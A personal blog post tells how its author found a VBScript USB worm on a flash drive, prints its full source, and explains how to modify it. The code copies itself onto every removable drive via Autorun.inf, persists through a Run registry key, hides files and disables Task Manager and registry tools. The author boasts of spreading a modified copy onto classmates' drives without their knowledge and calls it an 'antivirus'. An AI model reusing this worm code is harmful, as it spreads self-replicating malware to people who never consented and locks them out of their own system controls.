Virus Became Anitivirus

Google+ Pinterest LinkedIn Tumblr +

 After loge time receiving some data from a professor at college, I push my jetflash drive into its usbport. After  scanning process appears & closes. I became Satisfied, I open myflash drive. I found all the data relavent to my professor gave me alone with taht i found  one extra file. named as A readme file. i though it is new then I open it & there is some garbage written in that file. So I delete it.

But..there it is back again. Now iDelete it again & again its back. Ido,t know what it is, so I open task manager. Nope Doesn’t open. so I try msconfig, the registry but even they are blocked every thingin my computer. This is exciting. Not because I have work to do or because Now i start  love to get infected but because of the fact that the result of tinkering around would finally i got some code. So my greed for a nifty code begins.

This all will happen in windows soI restart the PC & boot into linux (Ohh yes, it’s the lovely Ubuntu from DVD). So I acess or open windows files from here, now  browse to system32 & checked those files. I also very much inserted the infected flash drive back agin  but don’t worry whatever it does,because it cannot play with my lovely linux. now agin i Found three extra files in drive:

An Idiotic readme
Ujbright_Antivirus.vbs
Autorun.inf

It was interesting for me was that second file. In tha i found  script of course. I open it & find it true programe of the logic build in that. While wrriting win script, a destined to run after some time again & again & again. But all it did was not curroption but to save its existence & copy in to every flash drive it saw. This was in the script in that second  file:
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set wscr = CreateObject(“WScript.Shell”)
win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)
If Mid(x, 4) = “UjBright_Antivirus.vbs” Then
wscr.Run “explorer.exe ” & fso.Getfile(tf).Drive.Path
End If
Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop
ax = fso.FileExists(win & “\UjBright_Antivirus.vbs”)
Set myFile = fso.CreateTextFile(win & “\UjBright_Antivirus.vbs”, true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(win & “\UjBright_Antivirus.vbs”)
fAttr.Attributes=39
wscr.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe”, “wscript.exe “”” & win & “\UjBright_Antivirus.vbs”””
If ax = false Then wscr.Run “wscript.exe “”” & win & “\UjBright_Antivirus.vbs”””

While (true)
Set myDrives = fso.Drives
For Each myFlashDrive In myDrives
If myFlashDrive.Drivetype = 1 And myFlashDrive.Path “A:” Then
If fso.FileExists(myFlashDrive.Path & “\Autorun.inf”) Then
Set fAttr = fso.Getfile(myFlashDrive.Path & “\Autorun.inf”)
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & “\Autorun.inf”, true
End If
Set auFile = fso.CreateTextFile(myFlashDrive.Path & “\Autorun.inf”, true)
auFile.write “[autorun]” & vbCrLf & “open=\” & vbCrLf & “open=wscript.exe UjBright_Antivirus.vbs” & vbCrLf & “shell\Open\Command=wscript.exe UjBright_Antivirus.vbs” & vbCrLf & “shell\Open\Default=1”
auFile.close
Set auFile = fso.CreateTextFile(myFlashDrive.Path & “\README.txt”, true)
auFile.write “Hello FRIENDS:” & vbCrLf & “Maaaring virus ito kung tawagin at makikita ng ibang ANTI-VIRUS, ngunit wag mag-alala kung ito’y hindi makikilala ng anu mang ANTI-VIRUS na nasa sa inyo.” & vbCrLf & “Dahil ito ang tanging paraan ko upang matugunan ang ibang ANTI-VIRUS na hindi makikilala ang ganitong SCRIPTO na VIRUS na nakakasama” & vbCrLf & “ay kaya nitong PALITAN na maaring ayusin niya ang ibang sinira dulot ng NAKAKASIRA na VIRUS.” & vbCrLf & ” ” & vbCrLf & “-A-D-V-E-R-T-I-S-I-N-G-” & vbCrLf & “EARLY ADVENT ADVERTISING – Tarpaulin nila ay durable matagal kumupas, tag-init man o tag-araw.” & vbCrLf & “RB PHOTOART STUDIO – May kagandahan sa kulay ng inyong PICTURE at durable pa.” & vbCrLf & “104.1 DXMA WOW FM – Pinakikinggang himpilan ng RADIO. Numero UNO sa Central Mindanao.” & vbCrLf & ” ” & vbCrLf & “PARA SA GUSTONG MAGPA-ADVERTISE:” & vbCrLf & “JUST CONTACT ME: 09083223171 – UJBRIGHT”
auFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & “\Autorun.inf”)
fAttr.Attributes=39
Set myFile = fso.CreateTextFile(myFlashDrive.Path & “\UjBright_Antivirus.vbs”, true)
myFile.write scrText
myFile.close
Set fAttr = fso.Getfile(myFlashDrive.Path & “\UjBright_Antivirus.vbs”)
fAttr.Attributes=39
End If
Next
With wscr
.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe”, “wscript.exe “”” & win & “\UjBright_Antivirus.vbs”””
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden”, 1, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun”, 128, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 1, “REG_DWORD”
End With
If tf win & “\UjBright_Antivirus.vbs” Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If
WScript.Sleep 10000
Wend

Big Scary file Isn’t it. Well, not quite actually. If you have programmed with scripts earlier, then it wont be really difficult to get this. After looking at the code for a while, I figured what it did. Here is it in brief:

Checked for flash drives
Checked if autorun, readme & script present.
If not, writes autorun.inf, copy of script.
Write the Read me Garbage.
Hides file extensions, disables regedit, etc
Sleep for 10000 seconds

So in short it was a nice little script which could be modified. You can see those end parts where the registry & task manger is disabled, hidden files are hidden, extensions are hidden, etc

.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe”, “wscript.exe “”” & win & “\UjBright_Antivirus.vbs”””
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden”, 1, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun”, 128, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1, “REG_DWORD”
.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 1, “REG_DWORD”

All I had to do was turn the 1 to 0. Selecting the parts which we want by setting to 1 if needed else 0. That’s it. So now all it does is write that read me garbage into the flash drive as a tamed version of the virus script.

By the way, the readme turned out to be a message in other language. So I used google translate & copy pasted that message. It said something like “No Antivirus can remove me” & “if u want to advertise like this call me at this no.”, reflecting it as the work of some little guy trying to be over smart. Anyways, this code really helps me now. How?? :p

Well I have used it to spread a tag NIBBLE (my technical community) in all the flash drives at college. No one has a clue. But I guess now they will surely have seeing that I have confessed what I did here.

Also you may wonder where it turned into Antivirus. Well, I call it that way. As many of the other virus pose harm with that little Autorun in a flash drive. But such an Autorun will now be removed to be replaced by this harmless Autorun of my tamed virus. So open your pen drive with courage & delete away those unnecessary files if any. That’s what I call an Antivirus.

Share.

About Author

Leave A Reply